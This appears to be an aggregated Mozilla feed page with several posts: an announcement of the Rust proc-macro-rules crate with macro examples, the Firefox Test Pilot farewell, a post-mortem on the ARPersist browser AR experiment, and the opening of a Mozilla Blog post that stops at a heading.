I'm announcing a new library for procedural macro authors: proc-macro-rules (and on crates.io). It allows you to do macro_rules-like pattern matching inside a procedural macro. The goal is to smooth the transition from declarative to procedural macros (this works pretty well when used with the quote crate).

(This is part of my Christmas yak mega-shave. That might someday get a blog post of its own, but I only managed to shave about 1/3 of my yaks, so it might take till next Christmas).

Here's an example:

rules!(tokens => {
    ($finish:ident ($($found:ident)*) # [ $($inner:tt)* ] $($rest:tt)*) => {
        for f in found {
            do_something(finish, f, inner, rest[0]);
        }
    }
    (foo $($bar:expr)?) => {
        match bar {
            Some(e) => foo_with_expr(e),
            None => foo_no_expr(),
        }
    }
});

The example is kind of nonsense. The interesting thing is that the syntax is very similar to macro_rules macros. The patterns which are matched are exactly the same as in macro_rules (modulo bugs, of course). Metavariables in the pattern (e.g., $finish or $found in the first arm) are bound to fresh variables in the arm's body (e.g., finish and found). The types reflect the type of the metavariable (for example, $finish has type syn::Ident). Because $found occurs inside a $(...)*, it is matched multiple times and so has type Vec<syn::Ident>.

The syntax is:

rules!( $tokens:expr => { $($arm)* })

where $tokens evaluates to a TokenStream and the syntax of an $arm is given by

($pattern) => { $body }

or

($pattern) => $body,

where $pattern is a valid macro_rules pattern (which is not yet verified by the library, but should be) and $body is Rust code (i.e., an expression or block).

The intent of this library is to make it easier to write the 'frontend' of a procedural macro, i.e., to make parsing the input a bit easier. In particular to make it easy to convert a macro_rules macro to a procedural macro and replace a small part with some procedural code, without having to roll off the 'procedural cliff' and rewrite the whole macro.

As an example of converting macros, here is a declarative macro which is sort-of like the vec macro (example usage: let v = vec![a, b, c]):

macro_rules! vec {
    () => {
        Vec::new()
    };
    ( $( $x:expr ),+ ) => {
        {
            let mut temp_vec = Vec::new();
            $(
                temp_vec.push($x);
            )*
            temp_vec
        }
    };
}

Converting to a procedural macro becomes a mechanical conversion:

use quote::quote;
use proc_macro::TokenStream;
use proc_macro_rules::rules;

#[proc_macro]
pub fn vec(input: TokenStream) -> TokenStream {
    rules!(input.into() => {
        () => { quote! {
            Vec::new()
        }}
        ( $( $x:expr ),+ ) => { quote! {
            let mut temp_vec = Vec::new();
            #(
                temp_vec.push(#x);
            )*
            temp_vec
        }}
    }).into()
}

Note that we are using the quote crate to write the bodies of the match arms. That crate allows writing the output of a procedural macro in a similar way to a declarative macro by using quasi-quoting.

How it works

I'm going to dive in a little bit to the implementation because I think it is interesting. You don't need to know this to use proc-macro-rules, and if you only want to do that, then you can stop reading now.

rules is a procedural macro, using syn for parsing, and quote for code generation. The high-level flow is that we parse all code passed to the macro into an AST, then handle each rule in turn (generating a big if/else). For each rule, we make a pass over the rule to collect variables and compute their types, then lower the AST to a 'builder' AST (which duplicates some work at the moment), then emit code for the rule. That generated code includes Matches and MatchesBuilder structs to collect and store bindings for metavariables. We also generate code which uses syn to parse the supplied tokenstream into the Matches struct by pattern-matching the input.

The pattern matching is a little bit interesting: because we are generating code (rather than interpreting the pattern) the implementation is very different from macro_rules. We generate a DFA, but the pattern is not reified in a data structure but in the generated code. We only execute the matching code once, so we must be at the same point in the pattern for all potential matches, but they can be at different points in the input. These matches are represented in the MatchSet. (I didn't look around for a nice way of doing this, so there may be something much better, or I might have made an obvious mistake).

The key functions on a MatchSet are expect and fork. Both operate by taking a function from the client which operates on the input. expect compares each in-progress match with the input and if the input can be matched we continue; if it cannot, then the match is deleted. fork iterates over the in-progress matches, forking each one. One match is matched against the next element in the pattern, and one is not. For example, if we have a pattern ab?c and a single match which has matched a in the input then we can fork and one match will attempt to match b then c, and one will just match c.
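
Here is a toy, self-contained sketch of that fork idea (illustrative only; this is not code from the proc-macro-rules crate). Each in-progress match is just a cursor into the input, and fork duplicates every match so that one copy consumes an optional token while the other skips it:

// Toy model: a "match" is just a position in the input token list.
#[derive(Clone)]
struct Match {
    pos: usize,
}

// Keep only the matches that can consume `expected` at their current position.
fn expect(matches: &mut Vec<Match>, input: &[char], expected: char) {
    matches.retain_mut(|m| {
        if input.get(m.pos) == Some(&expected) {
            m.pos += 1;
            true
        } else {
            false
        }
    });
}

// Fork: one copy of each match tries to consume the optional token,
// the other copy skips it entirely.
fn fork_optional(matches: &mut Vec<Match>, input: &[char], optional: char) {
    let mut skipped = matches.clone();
    expect(matches, input, optional);
    matches.append(&mut skipped);
}

fn main() {
    // Pattern `a b? c` against the input "ac".
    let input: Vec<char> = "ac".chars().collect();
    let mut matches = vec![Match { pos: 0 }];
    expect(&mut matches, &input, 'a');
    fork_optional(&mut matches, &input, 'b');
    expect(&mut matches, &input, 'c');
    assert_eq!(matches.len(), 1); // exactly one surviving match
}

In the real crate the in-progress matches carry partially built metavariable bindings rather than a bare cursor, but the expect/fork control flow described above is the idea this sketch is imitating.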

One interesting aspect of matching is handling metavariable matching in repeated parts of a pattern, e.g., in $($n:ident: $e: expr),*. Here we would repeatedly try to match $n:ident: $e: expr and find values for n and e, we then need to push each value into a Vec<Ident> and a Vec<Expr>. We call this 'hoisting' the variables (since we are moving out of a scope while converting T to U<T>). We generate code for this which uses an implementation of hoist in the Fork trait for each MatchesBuilder, a MatchesHandler helper struct for the MatchSet, and generated code for each kind of repeat which can appear in a pattern.

Firefox Test PilotAdios, Amigo

TL;DR Firefox Test Pilot is flying off into the sunset on January 22nd, 2019. Currently active experiments will remain installed for all users, and will be available on addons.mozilla.org after this date. Non-extension experiments like Firefox Lockbox and Firefox Send will continue in active development as standalone products. In fact, both products will have significant launches in the near future. Stay tuned for updates in the coming months.

The Idea Town logo

I’ve been involved with Test Pilot since the project’s inception (true story, we called it Idea Town at that point) almost four years ago, so this announcement is definitely bittersweet for me. Nevertheless, I think it’s the right move for Mozilla, Firefox and for the Test Pilot team.

In this post, I’ll talk about the why of Test Pilot’s termination, the impact of the program at Mozilla, and what happens next.

Why is this happening?

Here’s where I feel like our team can rest on our laurels a little bit. Test Pilot being disbanded is more-or-less a symptom of our program’s successes both in terms of products shipped and cultural impact within the Firefox organization.

Prototyping as a culture

When we founded Test Pilot, my teammates and I wanted to address a dilemma at Mozilla that felt particularly acute at the time: we didn’t have a great way to get new Firefox features to market quickly or get feedback in a timely manner. Firefox ships to hundreds of millions of people, and follows a conservative release cadence as a consequence. While this supports the overall quality of the browser, it can be difficult to get feedback or understand user attitudes in service of feature development.

Test Pilot was envisioned as a response to this problem: what if we could validate products before we expended the energy to ship them at Firefox’s rather significant scale? What if we could leverage our most ardent supporters, solicit their input, and iterate toward better products or simply kill things that didn’t really work?

And Test Pilot scratched that itch. We helped engender what Mozilla now describes as a culture of experiments. When I started at Mozilla, prototyping and lightweight validation techniques were mostly alien to the company, but now they’re commonplace. Conversations at Mozilla about possible futures are now framed in terms of how we might experiment or prototype or conduct user research to make smart product decisions.

This is not to suggest that Test Pilot was alone in bringing about this change. We were maybe in the vanguard, but our thinking definitely co-evolved with many other teams at Mozilla, and this cultural shift is one of the reasons Test Pilot’s time has come. The company at large has learned a ton about privacy-respecting research, prototyping and product experimentation, and we’re no longer dependent on one team to drive these practices. As 2019 progresses, expect to see more opportunity to experiment with and participate in the development of new products at Mozilla.

Shipping and Receiving

Over the last three or so years, the Test Pilot team has built — or facilitated — a number of popular Firefox features like Screenshots, Containers, Facebook Container, and Activity Stream. We’ve also made a raft of popular add-ons like Side View, Firefox Color, Snooze Tabs, Tab Centre (RIP), and Min Vid, and facilitated Mozilla’s first non-browser mobile products in Notes, Lockbox, and Send.

We were always meant to be a small prototyping team, and while we paired with other groups internally to build some experiments, we wound up amassing a stable of products that we could not reasonably ask other parts of the organization to maintain. With each successful experiment, we shed some of our prototyping capability in service of developing and maintaining scaled product experiences.

To wit, when Screenshots became an early success in Test Pilot, it took three engineers and a designer off of building experiments for Test Pilot and onto the full-time job of managing and growing Screenshots in Firefox. Eighteen months later, Screenshots is a product that is now used 20M times a month and demonstrably improves Firefox retention.

At first glance this kind of problem might seem obvious: just bring in more people. Maybe in a perfect world that’s possible, but people and teams aren’t infinitely fungible or replaceable. Hiring is hard, as is bringing people into in-flight projects. Relative to other browser vendors, Mozilla is a small company that punches well above its weight. We don’t have a massive surplus of engineers, designers and product managers lying around in storage. Over time, our team simply had to grapple with a growing stable of products.

It’s a similar story with Send, a product for which we are preparing a new release featuring an Android client, Firefox Accounts integration and much larger transfer limits. In order to invest in this product, we’re peeling off more resourcing from prototyping. Long story short, we’ve self-cannibalized by building stuff now deemed important to the organization writ large.

From Features to Services

The other trigger for this change is that our team have been moving away from developing new Firefox features and starting to invest in services that stand apart from the browser and bring Mozilla’s core philosophical commitments to privacy, security and user control to new audiences.

Updated design spec for the next version of Firefox Send (we’re getting rid of the Test Pilot link 🙂)

Firefox Send in particular represents a service that works totally independently of the Firefox browser (in fact more people use it on Chrome than on Firefox). While Firefox Lockbox is definitely a companion app to the Firefox password manager for now, it’s also 100% mobile and backed by Firefox Accounts and Sync.

Whereas Test Pilot was initially intended to test Firefox features, products like these started to expand our horizons. Quickly, teams outside of Test Pilot started pushing into this space. Firefox Monitor, a service that lets you see if your passwords have been involved in a data breach, was a real hit for our company in 2018.

These types of projects represent a new set of opportunities to expand our brand. As they take up more and more of our time, maintaining a standalone platform for feature experimentation in the Firefox browser becomes more difficult to justify.

What’s Next

First things first: if you are using any currently active add-on experiment, you can keep using it. Nothing’s gonna change in your browser; we’ll just automatically migrate you off of the Test Pilot versions of the add-ons.

Firefox Send and Firefox Lockbox will continue in active development in 2019 as standalone products. Notes, Firefox Color, Side View, Price Wise, and Email Tabs will all remain available at addons.mozilla.org for the foreseeable future. (ed note: I’ll add links to these new URLs here once I have them early next week). Email Tabs in particular may undergo some changes to make it more flexible and less directly connected to GMail, but otherwise these projects will be accessible in their current forms with occasional maintenance releases going forward. Speaking for myself, I hope to add some new palette generators and color properties like borders, sidebars, new tab &c. to Firefox Color, a particular favorite of mine.

As for the Test Pilot site and add-on, we are replacing the site with a farewell message on January 22nd. Visiting the site after this date will automatically uninstall the Test Pilot add-on, but you can also just uninstall it manually if you wish whenever you like without affecting installed experiments.

This blog will remain available indefinitely. Since many of the projects that started in Test Pilot are still actively being worked on, we’ll continue to post updates to projects here as events warrant.

A final, slightly personal, note

Test Pilot has been an absolutely phenomenal project to work on for nearly four years. The Mozilla community gave so much life to the project, and my teammates and I remain deeply grateful for your support, encouragement, and willingness to contribute.

To have had the opportunity to evangelize prototyping and rapid, iterative development processes at Mozilla has been the greatest pleasure of my professional life. Sharing the journey with the incredible women and men on the Test Pilot team made the experience singularly amazing. It’s been a great ride, and I’m so excited to see what comes next.

Ad astra



Hacks.Mozilla.OrgAugmented Reality and the Browser — An App Experiment

We all want to build the next (or perhaps the first) great Augmented Reality app. But there be dragons! The space is new and not well defined. There aren’t any AR apps that people use every day to serve as starting points or examples. Your new ideas have to compete against an already very high quality bar of traditional 2d apps. And building a new app can be expensive, especially for native app environments. This makes AR apps still somewhat uncharted territory, requiring a higher initial investment of time, talent and treasure.

But this also creates a sense of opportunity; a chance to participate early before the space is fully saturated.

From our point of view the questions are: What kinds of tools do artists, developers, designers, entrepreneurs and creatives of all flavors need to be able to easily make augmented reality experiences? What kinds of apps can people build with tools we provide?

For example: Can I watch Trevor Noah on the Daily Show this evening, and then release an app tomorrow that is a riff on a joke he made the previous night? A measure of success is being able to speak in rich media quickly and easily, to be a timely part of a global conversation.

With Blair MacIntyre‘s help I wrote an experiment to play-test a variety of ideas exploring these questions. In this comprehensive post-mortem I’ll review the app we made, what we learned and where we’re going next.

Finding “good” use cases

To answer some of the above questions, we started out surveying AR and VR developers, asking them their thoughts and observations. We had some rules of thumb. What we looked for were AR use cases that people value, that are meaningful enough, useful enough, make enough of a difference, that they might possibly become a part of people’s lives.

Existing AR apps also provided inspiration. One simple AR app I like for example is AirMeasure, which is part of a family of similar apps such as the Augmented Reality Measuring Tape. I use it once or twice a month and while not often, it’s incredibly handy. It’s an app with real utility and has 6500 reviews on the App Store  – so there’s clearly some appetite already.

image of airmeasure, an augmented reality measuring tape

Sean White, Mozilla’s Chief R&D Officer, has a very specific definition for an MVP (minimum viable product). He asks: What would 100 people use every day?

When I hear this, I hear something like: What kind of experience is complete, compelling, and useful enough, that even in an earliest incarnation it captures a core essential quality that makes it actually useful for 100 real world people, with real world concerns, to use daily even with current limitations? Shipping can be hard, and finding those first users harder.

Browser-based AR

New Pixel phones, iPhones and other emerging devices such as the Magic Leap already support Augmented Reality. They report where the ground is, where walls are, and answer other kinds of environment-sensing questions critical for AR. They support pass-through vision and 3d tracking and registration. Emerging standards, notably WebXR, will soon expose these powers to the browser in a standards-based way, much like the way other hardware features are built and made available in the browser.

Native app development toolchains are excellent but there is friction. It can be challenging to jump through the hoops required to release a product across several different app stores or platforms. Costs that are reasonable for a AAA title may not be reasonable for a smaller project. If you want to knock out an app tonight for a client tomorrow, or post an app as a response to an article in the press or a current event— it can take too long.

With AR support coming to the browser there’s an option now to focus on telling the story rather than worrying about the technology, costs and distribution. Browsers historically offer lower barriers to entry, and instant deployment to millions of users, unrestricted distribution and a sharing culture. Being able to distribute an app at the click of a link, with no install, lowers the activation costs and enables virality. This complements other development approaches, and can be used for rapid prototyping of ideas as well.

ARPersist – the idea

In our experiment we explored what it would be like to decorate the world with virtual post-it notes. These notes can be posted from within the app, and they stick around between play sessions. Players can in fact see each other, and can see each other moving the notes in real time. The notes are geographically pinned and persist forever.

Using our experiment, a company could decorate their office with hints about how the printers work, or show navigation breadcrumbs to route a bewildered new employee to a meeting. Alternatively, a vacationing couple could walk into an AirBNB, open an “ARBNB” app (pardon the pun) and view post-it notes illuminating where the extra blankets are or how to use the washer.

We had these kinds of aspirational use case goals for our experiment:

  • Office interior navigation: Imagine an office decorated with virtual hints and possibly also with navigation support. Often a visitor or corporate employee shows up in an unfamiliar place — such as a regional Mozilla office or a conference hotel or even a hospital – and they want to be able to navigate that space quickly. Meeting rooms are on different floors — often with quirky names that are unrelated to location.  A specific hospital bed with a convalescing friend or relative could be right next door or up three flights and across a walkway. I’m sure we’ve all struggled to find bathrooms, or the cafeteria, or that meeting room. And even when we’ve found what we want – how does it work, who is there, what is important? Take the simple example of a printer. How many of us have stood in front of a printer for too long trying to figure out how to make a single photocopy?
  • Interactive information for house guests: Being a guest in a person’s home can be a lovely experience. AirBNB does a great job of fostering trust between strangers. But is there a way to communicate all the small details of a new space? How to use the Nest sensor, how to use the fancy dishwasher? Where is the spatula? Where are extra blankets? An AirBNB or shared rental could be decorated with virtual hints. An owner walks around the space and posts up virtual post-it notes attached to some of the items, indicating how appliances work. A machine-assisted approach also is possible – where the owner walks the space with the camera active, opens every drawer and lets the machine learning algorithm label and memorize everything. Or, imagine a real-time variation where your phone tells you where the cat is, or where your keys are. There’s a collaborative possibility as well here, a shared journal, where guests could leave hints for each other — although this does open up some other concerns which are tricky to navigate – and hard to address.
  • Public retail and venue navigation: These ideas could also work in a shopping scenario to direct you to the shampoo, or in a scenario where you want to pinpoint friends in a sports coliseum or concert hall or other visually noisy venue.

ARPersist – the app

Taking these ideas we wrote a standalone app for the iPhone 6S or higher — which you can try at arpersist.glitch.me and play with the source code at github.com/anselm/arpersist.

Here’s a short video of the app running, which you might have seen some days ago in my tweet:

And more detail on how to use the app if you want to try it yourself:

Here’s an image of looking at the space through the iPhone display:

An AR hornet in the living room as seen through the iphone

And an image of two players – each player can see the other player’s phone in 3d space and a heart placed on top of that in 3d:

You’ll need the WebXR Viewer for iOS, which you can get on the iTunes store. (WebXR standards are still maturing so this doesn’t yet run directly in most browsers.)

This work is open source, it’s intended to be re-used and intended to be played with, but also — because it works against non-standard browser extensions — it cannot be treated as something that somebody could build a commercial product with (yet).

The videos embedded above offer a good description: Basically, you open ARPersist, (using the WebXR viewer linked above on an iPhone 6s or higher), by going to the URL (arpersist.glitch.me). This drops you into a pass-through vision display. You’ll see a screen with four buttons on the right. The “seashell” button at the bottom takes you to a page where you can load and save maps. You’ll want to “create an anchor” and optionally “save your map”. At this point, from the main page, you can use the top icon to add new features to the world. Objects you place are going to stick to the nearest floor or wall. If you join somebody else’s map, or are at a nearby geographical location, you can see other players as well in real time.

This app features downloadable 3d models from Sketchfab. These are the assets I’m using:

  1. Flying Hornet by Ashley Aslett
  2. Low Poly Crow by fernandogilmiranda
  3. Love Low Poly by Suwulo

What went well

Coming out of that initial phase of development I’ve had many surprising realizations, and even a few eureka moments. Here’s what went well, which I describe as essential attributes of the AR experience:

  • Webbyness. Doing AR in a web app is very very satisfying. This is good news because (in my opinion) mobile web apps more typically reflect how developers will create content in the future. Of course there are questions still, such as payment models and the difficulty of encrypting or obfuscating art assets if those assets are valuable. For example, a developer can buy a 3d model off the web and trivially incorporate that model into a web app, but it’s not yet clear how to do this without violating licensing terms around re-distribution and how to compensate creators per use.
  • Hinting. This was a new insight. It turns out semantic hints are critical, both for intelligently decorating your virtual space with objects but also for filtering noise. By hints I mean being able to say that the intent of a virtual object is that it should be shown on the floor, or attached to a wall, or on top of the watercooler. There’s a difference between simply placing something in space and understanding why it belongs in that position. Also, what quickly turns up is an idea of priorities. Some virtual objects are just not as important as others. This can depend on the user’s context. There are different layers of filtering, but ultimately you have some collection of virtual objects you want to render, and those objects need to argue amongst themselves which should be shown where (or not at all) if they collide. The issue isn’t the contention resolution strategy — it’s that the objects themselves need to provide rich metadata so that any strategies can exist. I went as far as classifying some of the kinds of hints that would be useful. When you make a new object there are some toggle fields you can set to help with expressing your intention around placement and priority.
  • Server/Client models. In serving AR objects to the client a natural client server pattern emerges. This model begins to reflect a traditional RSS pattern — with many servers and many clients. There’s a chance here to try and avoid some of the risky concentrations of power and censorship that we see already with existing social networks. This is not a new problem, but an old problem that is made more urgent. AR is in your face — and preventing centralization feels more important.
  • Login/Signup. Traditional web apps have a central sign-in concept. They manage your identity for you, and you use a password to sign into their service. However, today it’s easy enough to push that back to the user.

    This gets a bit geeky — but the main principle is that if you use modern public key cryptography to self-sign your own documents, then a central service is not needed to validate your identity. Here I implemented a public/private keypair system similar to Metamask. The strategy is that the user provides a long phrase and then I use Ian Coleman’s Mnemonic Code Converter bip39 to turn that into a public/private keypair. (In this case, I am using bitcoin key-signing algorithms.)

    In my example implementation, a given keypair can be associated with a given collection of objects, and it helps prune a core responsibility away from any centralized social network. Users self-sign everything they create.

  • 6DoF control. It can be hard to write good controls for translating, rotating and scaling augmented reality objects through a phone. But towards the end of the build I realized that the phone itself is a 6dof controller. It can be a way to reach, grab, move and rotate — and vastly reduce the labor of building user interfaces. Ultimately I ended up throwing out a lot of complicated code for moving, scaling and rotating objects and replaced it simply with a single power, to drag and rotate objects using the phone itself. Stretching came for free — if you tap with two fingers instead of one finger then your finger distance is used as the stretch factor.
  • Multiplayer. It is pretty neat having multiple players in the same room in this app. Each of the participants can manipulate shared objects, and each participant can be seen as a floating heart in the room — right on top of where their phone is in the real world. It’s quite satisfying. There wasn’t a lot of shared compositional editing (because the app is so simple) but if the apps were more powerful this could be quite compelling.

Challenges that remain

We also identified many challenges. Here are some of the ones we faced:

  • Hardware. There’s a fairly strong signal that Magic Leap or Hololens will be better platforms for this experience. Phones just are not a very satisfying way to manipulate objects in Augmented Reality. A logical next step for this work is to port it to the Magic Leap or the Hololens or both or other similar emerging hardware.
  • Relocalization. One serious, almost blocker problem had to do with poor relocalization. Between successive runs I couldn’t reestablish where the phone was. Relocalization, my device’s ability to accurately learn its position and orientation in real world space, was unpredictable. Sometimes it would work many times in a row when I would run the app. Sometimes I couldn’t establish relocalization once in an entire day. It appears that optimal relocalization is demanding, and requires very bright sunlight, stable lighting conditions and jumbled sharp edge geometry. Relocalization on passive optics is too hard and it disrupts the feeling of continuity — being able to quit the app and restart it, or enabling multiple people to share the same experience from their own devices. I played with a work-around, which was to let users manually relocalize — but I think this still needs more exploration.

    This is ultimately a hardware problem. Apple/Google have done an unbelievable job with pure software but the hardware is not designed for the job. Probably the best short-term answer is to use a QRCode. A longer term answer is to just wait a year for better hardware. Apparently next-gen iPhones will have active depth sensors and this may be an entirely solved problem in a year or two. (The challenge is that we want to play with the future before it arrives — so we do need some kind of temporary solution for now.)

  • Griefing. Although my test audience was too small to have any griefers — it was pretty self-evident that any canonical layer of reality would instantly be filled with graphical images that could be offensive or not safe for work (NSFW). We have to find a way to allow for curation of layers. Spam and griefing are important to prevent but we don’t want to censor self-expression. The answer here was to not have any single virtual space but to let people self select who they follow. I could see roles emerging for making it easy to curate and distribute leadership roles for curation of shared virtual spaces — similar to Wikipedia.
  • Empty spaces. AR is a lonely world when there is nobody else around. Without other people nearby it’s just not a lot of fun to decorate space with virtual objects at all. So much of this feels social. A thought here is that it may be better, and possible, to create portals that wire together multiple AR spaces — even if those spaces are not actually in the same place — in order to bring people together to have a shared consensus. This begins to sound more like VR in some ways but could be a hybrid of AR and VR together. You could be at your house, and your friend at their house, and you could join your rooms together virtually, and then see each others post-it notes or public virtual objects in each others spaces (attached to the nearest walls or floors as based on the hints associated with those objects).
  • Security/Privacy. Entire posts could be written on this topic alone. The key issue is that sharing a map to a server, that somebody else can then download, means leaking private details of your own home or space to other parties. Some of this simply means notifying the user intelligently — but this is still an open question and deserves thought.
  • Media Proxy. We’re fairly used to being able to cut and paste links into slack or into other kinds of forums, but the equivalent doesn’t quite yet exist in VR/AR, although the media sharing feature in Hubs, Mozilla’s virtual reality chat system and social environment, is a first step. It would be handy to paste not only 3d models but also PDFs, videos and the like. There is a highly competitive anti-sharing war going on between rich media content providers and entities that want to allow and empower sharing of content. Take the example of iframely, a service that aims to simplify and optimize rich media sharing between platforms and devices.

Next steps

Here’s where I feel this work will go next:

  • Packaging. Although the app works “technically” it isn’t that user friendly. There are many UI assumptions. When capturing a space one has to let the device capture enough data before saving a map. There’s no real interface for deleting old maps. The debugging screen, which provides hints about the system state, is fairly incomprehensible to a novice. Basically the whole acquisition and tracking phase should “just work” and right now it requires a fair level of expertise. The right way to exercise a more cohesive “package” is to push this experience forward as an actual app for a specific use case. The AirBNB decoration use case seems like the right one.
  • HMD (Head-mounted display) support. Magic Leap or Hololens or possibly even Northstar support. The right place for this experience is in real AR glasses. This is now doable and it’s worth doing. Granted every developer will also be writing the same app, but this will be from a browser perspective, and there is value in a browser-based persistence solution.
  • Embellishments. There are several small features that would be quick easy wins. It would be nice to show contrails of where people moved through space for example. As well it would be nice to let people type in or input their own text into post-it notes (right now you can place gltf objects off the net or images). And it would be nice to have richer proxy support for other media types as mentioned. I’d like to clarify some licensing issues for content as well in this case. Improving manual relocalization (or using a QRCode) could help as well.
  • Navigation. I didn’t do the in-app route-finding and navigation; it’s one more piece that could help tell the story. I felt it wasn’t as critical as basic placement, but it would help argue the use cases.
  • Filtering. We had aspirations around social networking, such as filtering content by peers, that we just didn’t get to test out. This will be important in the future.

Several architecture observations

This research wasn’t just focused on user experience; it also explored internal architecture. As a general rule I believe that the architecture behind an MVP should reflect a mature partitioning of the jobs the full-blown app will deliver. Even in nascent form, the MVP has to architecturally reflect the larger code base it will become. The current implementation of this app consists of these parts (which I think reflect important parts of a more mature system):

  • Cloud Content Server. A server must exist which hosts arbitrary data objects from arbitrary participants. We needed some kind of hosting that people can publish content to. In a more mature universe there could be many servers; servers could just be WordPress, and content could just be GeoRSS. Right now, however, I have a single server, though that server doesn’t have much responsibility: it is just a shared database (a rough sketch of the kind of record it stores follows this list). There is a third-party ARCloud initiative which speaks to this as well.
  • Content Filter. Filtering content is an absurdly critical MVP requirement. We must be able to show that users can control what they see. I imagine this filter as a perfect agent, a kind of copy of yourself that has the time to carefully inspect every single data object and ponder if it is worth sharing with you or not. The content filter is a proxy for you, your will. It has perfect serendipity, perfect understanding and perfect knowledge of all things. The reality of course falls short of this — but that’s my mental model of the job here. The filter can exist on device or in the cloud.
  • Renderer. The client-side rendering layer deals with painting stuff on your field of view. It deals with contention resolution between objects competing for your attention. It handles presentation semantics (that some objects want to be shown in certain places) as well as ideas around fundamental UX paradigms for how people will interact with AR. Basically it invents an AR desktop, a fundamental AR interface, for mediating human interaction. Again, of course, we can’t do all of this, but that’s my mental model of the job here.
  • Identity Management. This is unsolved for the net at large and is destroying communication on the net. It’s arguably one of the most serious problems in the world today because if we can’t communicate, and know that other parties are real, then we don’t have a civilization. It is a critical problem for AR as well because you cannot have spam and garbage content in your face. The approach I mentioned above is to have users self-sign their utterances. On top of this would be conventional services to build up follow lists of people (or what I call emitters) and then arbitration between those emitters using a strategy to score emitters based on the quality of what they say, somewhat like a weighted contextual network graph.
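To make the partitioning above concrete, here is a minimal sketch, in TypeScript, of the kind of record the content server might store and the shape of the filter that guards the renderer. Every name and field here is illustrative, an assumption on my part rather than the app’s actual schema.

```typescript
// Hypothetical shapes, for illustration only -- not the app's real schema.

interface GeoPose {
  latitude: number;   // degrees
  longitude: number;  // degrees
  elevation: number;  // meters
  orientation: [number, number, number, number]; // quaternion (x, y, z, w)
}

interface SharedObject {
  id: string;
  authorPublicKey: string; // the "emitter" who self-signed this utterance
  signature: string;       // signature over the payload, verifiable by followers
  contentUrl: string;      // e.g. a glTF model, an image, or a note payload
  pose: GeoPose;           // where the object claims to live in the world
  createdAt: number;       // unix epoch milliseconds
}

// The content filter is modelled as a predicate acting on your behalf:
// it decides, per object, whether the renderer ever gets to see it.
type ContentFilter = (obj: SharedObject, followed: Set<string>) => boolean;

// A trivial filter: only show objects signed by emitters you follow.
const followOnlyFilter: ContentFilter = (obj, followed) =>
  followed.has(obj.authorPublicKey);
```

A follow list plus a predicate like this is enough to express the “self-signed utterances from emitters you trust” model without the server itself taking on any moderation responsibility.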

An architectural observation regarding geolocation of all objects

One other technical point deserves a bit more elaboration. Before we started we had to answer the question of “how do we represent or store the location of virtual objects?”. Perhaps this isn’t a great conversation starter at the pub on a Saturday night, but it’s important nevertheless.

We take so many things for granted in the real world – signs, streetlights, buildings. We expect them to stick around even when we look away. But programming is like universe building: you have to do everything by hand.

The approach we took may seem obvious: to define object position with GPS coordinates. We give every object a latitude, longitude and elevation (as well as orientation).

But the gotcha is that phones today don’t have precise geolocation. We had to write a wrapper of our own. When users start our app we build up (or load) an augmented reality map of the area. That map can be saved back to a server with a precise geolocation. Once there is a map of a room, then everything in that map is also very precisely geo-located. This means everything you place or do in our app is in fact specified in earth global coordinates.
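As a rough sketch of how that wrapper’s bookkeeping could work, an object stored relative to a saved map can be promoted to global coordinates once the map itself has a precise geolocation. The names and the flat-earth shortcut below are mine, for illustration, not the app’s actual code.

```typescript
// Geodetic position of the saved AR map's origin (illustrative types).
interface MapAnchor {
  latitude: number;  // degrees
  longitude: number; // degrees
  elevation: number; // meters
}

// An object's offset from the map origin, in meters (east, north, up).
interface LocalOffset {
  east: number;
  north: number;
  up: number;
}

const METERS_PER_DEGREE_LAT = 111_320; // rough spherical-earth approximation

// Promote a map-relative offset to global coordinates. Good enough over
// room-sized distances; a real implementation would use a proper geodetic
// library instead of this flat-earth shortcut.
function toGlobal(anchor: MapAnchor, offset: LocalOffset): MapAnchor {
  const latRad = (anchor.latitude * Math.PI) / 180;
  return {
    latitude: anchor.latitude + offset.north / METERS_PER_DEGREE_LAT,
    longitude:
      anchor.longitude + offset.east / (METERS_PER_DEGREE_LAT * Math.cos(latRad)),
    elevation: anchor.elevation + offset.up,
  };
}
```

The point is that only the map anchor needs a high-quality geodetic fix; every object placed in that map inherits its precision.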

Blair points out that although modern smartphones (and other devices) today don’t have very accurate GPS, this is likely to change soon. We expect that in the next year or two GPS will become hyper-precise, augmented by 3D depth maps of the landscape, making our wrapper optional.

Conclusions

Our exploration has been taking place in conversation and code. Personally I enjoy this praxis — spending some time talking, and then implementing a working proof of concept. Nothing clarifies thinking like actually trying to build an example.

At the 10,000 foot view, at the idealistic end of the spectrum, it is becoming obvious that we all have different ideas of what AR is or will be. The AR view I crave is one of many different information objects from many different providers: personal reminders, city traffic overlays, weather bots, friend location notifiers, contrails of my previous trajectories through space, and so on. It feels like a creative medium. I see users wanting to author objects, where different objects have different priorities, where different objects are “alive,” with their own will, mobility, and interactions with each other. In this way an AR view echoes a natural view of the default world, with all kinds of entities competing for our attention.

Stepping back even further, to a 100,000 foot view, there are several fundamental communication patterns that humans use creatively. We use visual media (signage) and we use audio (speaking, voice chat). We have high-resolution, high-fidelity expressive capabilities that include our body language, our hand gestures, and especially a hugely rich facial expressiveness. We also have text-based media, and many other kinds of media. It feels like when anybody builds a communication medium that easily allows humans to channel some of their high-bandwidth needs over that pipeline, that medium can become very popular. Skype, messaging, wikis, even music: all of these things meet fundamental expressive human drives; they are channels for output and expressiveness.

In that light, a question that’s emerging for me is “Is sharing 3D objects in space a fundamental communication medium?” If so, then the question becomes “What are reasons to NOT build a minimal capability to express the persistent 3D placement of objects in space?” Clearly the work needs to make money and be sustainable for the people who make it. Are we tapping into something fundamental enough, valuable enough, even in early incarnations, that people will spend money (or energy) on it? I posit that if we help express fundamental human communication patterns, we all succeed.

What’s surprising is the power of persistence. When the experience works well I have the mental illusion that my room really does have these virtual images and objects in it. Our minds seem deeply fooled by the illusion of persistence. As with using the Magic Leap, there’s a sense of “magic”: the sense that there’s another world that you can see if you squint just right. Even after you put down the device that feeling lingers. Augmented Reality is starting to feel real.

The post Augmented Reality and the Browser — An App Experiment appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla Blog - Evolving Firefox’s Culture of Experimentation: A Thank You from the Test Pilot Program

For the last three years Firefox has invested heavily in innovation, and our users have been an essential part of this journey. Through the Test Pilot Program, Firefox users have been able to help us test and evaluate a variety of potential Firefox features. Building on the success of this program, we’re proud to announce today that we’re evolving our approach to experimentation even further.

Lessons Learned from Test Pilot

Test Pilot was designed to harness the energy of our most passionate users. We gave them early prototypes and product explorations that weren’t ready for wide release. In return, they gave us feedback and patience as these projects evolved into the highly polished features within our products today. Through this program we have been able to iterate quickly, try daring new things, and build products that our users have been excited to embrace.

Graduated Features

